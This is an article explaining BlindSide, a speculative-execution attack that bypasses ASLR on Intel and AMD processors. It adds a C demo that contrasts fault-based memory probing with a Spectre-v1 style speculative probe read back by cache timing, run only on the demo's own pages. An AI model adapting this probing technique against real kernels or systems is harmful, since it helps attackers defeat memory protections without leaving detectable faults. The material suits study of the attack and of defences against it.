Researchers from ETH Zurich, the Stevens Institute of Technology, and Vrije Universiteit Amsterdam have presented a new speculative-execution attack they call BlindSide…
The attack does not depend on a particular microarchitecture and has been demonstrated on both Intel and AMD processors. The essence of BlindSide is to abuse a feature that exists to boost processor performance, speculative execution, and use it to bypass ASLR (Address Space Layout Randomization).
The researchers also note that the patches previously released for well-known speculative-execution bugs such as Spectre and Meltdown do not stop BlindSide.
To defeat ASLR, the researchers explain, an attacker normally needs a separate information-leak vulnerability: probe memory, find where the target code and data were placed, and then aim the exploit precisely at those addresses. Probing of this kind is usually easy to spot, because a wrong guess typically crashes the target or leaves a fault in the logs, and defenses can react to it. BlindSide moves the probing into speculative execution, so that the guesses are never architecturally executed and the attacker can go unnoticed.
Speculative execution is itself a performance feature: rather than wait for a slow branch condition to resolve, the processor guesses the outcome and runs the instructions past it in advance; if the guess turns out to be wrong, the results are discarded, although traces of the work remain in the cache. According to the researchers, the same mechanism can be used to "amplify the severity of common vulnerabilities, including memory corruption bugs". In other words, BlindSide uses a single memory-corruption bug to fire probe after probe in speculation, scanning memory until ASLR is eventually defeated.
Because the probing happens only in speculation, failed attempts do not crash the target and leave no trace the operating system can notice; they are practically invisible. All the attacker needs is one ordinary memory-corruption vulnerability. For their demonstration the researchers used a buffer overflow in the Linux kernel. The video below demonstrates the test attack in action.
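To make the contrast concrete, here is an added example (not code from the BlindSide paper or from this article) that puts the two probing styles described above side by side in user space: an architectural probe, where every wrong guess is a page fault the OS sees, and a speculative probe in the BlindSide style, where the candidate address is dereferenced only on a mispredicted branch and the result is read back through the cache. It assumes Linux and gcc; the Spectre-v1 gadget (`gadget`), the probe targets (`page`) and all names are constructed here, the speculative part is x86-64 only, and its result is a noisy cycle count rather than a clean yes/no.

```c
// Added example, not code from the BlindSide paper or from this article. It
// contrasts an architectural probe, whose every wrong guess is a visible fault,
// with a speculative probe in the BlindSide style, read back through the cache.
// Assumes Linux and gcc; the speculative part is x86-64 only and yields a noisy timing.
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

static sigjmp_buf probe_env;
static volatile sig_atomic_t fault_count;   /* faults the OS got to see */
static volatile unsigned char sink;         /* keeps the probing loads alive */

static void on_segv(int sig) { (void)sig; fault_count++; siglongjmp(probe_env, 1); }

/* Architectural probe: really touch the address. Returns 1 if readable, 0 if
 * the access faulted. Against a kernel each miss is an oops in the log and
 * usually a dead process: the detectable signal the article refers to. */
int arch_probe(const void *addr) {
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);
    volatile int mapped = 0;
    if (sigsetjmp(probe_env, 1) == 0) {
        sink = *(volatile const unsigned char *)addr;
        mapped = 1;
    }
    sigaction(SIGSEGV, &old, NULL);
    return mapped;
}

#if defined(__x86_64__)
#include <x86intrin.h>
static unsigned char probe_line[64] __attribute__((aligned(64)));
static size_t bound[16];            /* bound[0]: branch condition, read from memory */
static volatile size_t zero_mult;   /* always 0, but opaque to the compiler */

/* Spectre-v1 style gadget standing in for the kernel bug: the body runs
 * architecturally only for i < bound[0], but speculatively for any i once
 * bound[0] is out of the cache. In speculation a load from an unmapped candidate
 * faults silently and the dependent probe_line load is never issued. */
__attribute__((noinline))
static void gadget(size_t i, const unsigned char *candidate) {
    if (i < bound[0]) {
        unsigned char v = *candidate;
        sink = probe_line[(size_t)v * zero_mult];   /* depends on v: index is 0 at run time */
    }
}

static uint64_t reload_cycles(const void *p) {
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    sink = *(volatile const unsigned char *)p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* Speculative probe: reload time of probe_line after one mispredicted pass.
 * A hit (tens of cycles) suggests the candidate was mapped, a miss (hundreds)
 * that the speculative load faulted. fault_count never moves: the OS sees nothing. */
uint64_t spec_probe(const unsigned char *candidate) {
    bound[0] = 8;
    for (size_t i = 0; i < 8; i++)             /* train the predictor: taken */
        gadget(i, (const unsigned char *)&bound[1]);
    _mm_clflush(&bound[0]);                    /* slow bound load: predictor decides */
    _mm_clflush(probe_line);
    _mm_mfence();
    gadget(16, candidate);                     /* out of bounds: body runs only speculatively */
    return reload_cycles(probe_line);
}
#else
uint64_t spec_probe(const unsigned char *candidate) { (void)candidate; return 0; }
#endif

/* Constructed probe targets: one readable page, one PROT_NONE page. */
static unsigned char *page(int prot) { return mmap(NULL, 4096, prot, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); }

/* 1 if the readable page probes as mapped, the PROT_NONE page as not, and that
 * single miss was reported to the OS as exactly one fault. */
int arch_probe_demo(void) {
    unsigned char *ok = page(PROT_READ | PROT_WRITE), *no = page(PROT_NONE);
    sig_atomic_t before = fault_count;
    int r = arch_probe(ok) == 1 && arch_probe(no) == 0 && fault_count == before + 1;
    munmap(ok, 4096); munmap(no, 4096);
    return r;
}

int main(void) {
    unsigned char *ok = page(PROT_READ | PROT_WRITE), *no = page(PROT_NONE);
    printf("architectural: consistent=%d, faults seen by OS=%d\n", arch_probe_demo(), (int)fault_count);
    printf("speculative: readable=%llu unreadable=%llu cycles, faults seen by OS=%d\n",
           (unsigned long long)spec_probe(ok), (unsigned long long)spec_probe(no), (int)fault_count);
    return 0;
}
```

The first line of output is deterministic: the architectural miss is counted as a fault, which is exactly the footprint a kernel target would log. The second line is the BlindSide idea in miniature: the fault counter stays where it was, and the only information about whether the candidate page was readable is the difference in reload time, which on a vulnerable CPU is a cache hit for the readable page and a miss for the PROT_NONE one, and on a mitigated or virtualized CPU may be indistinguishable noise.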